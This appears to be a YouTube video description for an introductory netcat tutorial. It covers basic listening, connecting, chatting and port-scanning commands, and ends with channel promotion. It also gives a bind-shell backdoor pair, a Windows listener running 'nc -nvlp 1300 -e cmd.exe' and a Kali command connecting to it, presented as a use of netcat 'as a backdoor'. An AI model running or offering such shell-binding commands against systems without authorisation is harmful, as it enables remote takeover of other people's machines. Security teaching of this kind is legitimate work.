Netcat Tutorial Introduction to Netcat Fundamentals of Cybersecurity











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#Netcat #Cybersecurity #Cybersecuritytutorials #NetcatTutorials #EthicalHacking #Hackers #Cyberattack • Netcat (nc) -- Network utility for reading from and writing to network connection using TCP and UDP. • In windows, • nc.exe -nvlp 1100 (-n numeric IP address, -V Verbose, -l Listen, -p Ports) • In Kali, • #nc -nv (target IP) (Port Number) • Then you are connected, send hello message. • It is also used for port scanning, and port listening. • nc -v -w2 -z (target IP) range of port (1-100) • where, -v verbose, -w2 wait no more then 2 seconds, -z prevent you from sending any TCP data, range of port (any range of port number). • It also transfer file using netcat or as a backdoor into other network. • Windows -- # nc -nvlp 1300 -e cmd.exe • Kali -- # nc -nv 192.168.117.128 1300 • What is netcat ? • How to use Netcat ? • Netcat Tutorials • How to use Netcat to chat with another? • How to use Netcat for backdoor? • Subscribe for more videos :    / nileshkumarjadav   • Follow me on Twitter -   / nilusilu3   • Connect me with Linkedin -   / nileshjadav   • Follow me on Instagram -   / nileshk12345   • Follow my Facebook Page -   / technocube-107350507784929   • For more .NET related Projects : https://www.c-sharpcorner.com/members... • Our main goal is to improvise Science and Technology with better motivation, this can be achieved by developing something better and life saver application. • This Channel contain low level programming on C#, Asp.Net, SQL Server apart from that it also deals with CyberSecurity and its major domain, Linux Stuff and also Advance Computer Networking. The channel outcome is specifically for the people who are working majorly with developing software and websites furthermore for people who are constantly diving deep in the cybersecurity domain.

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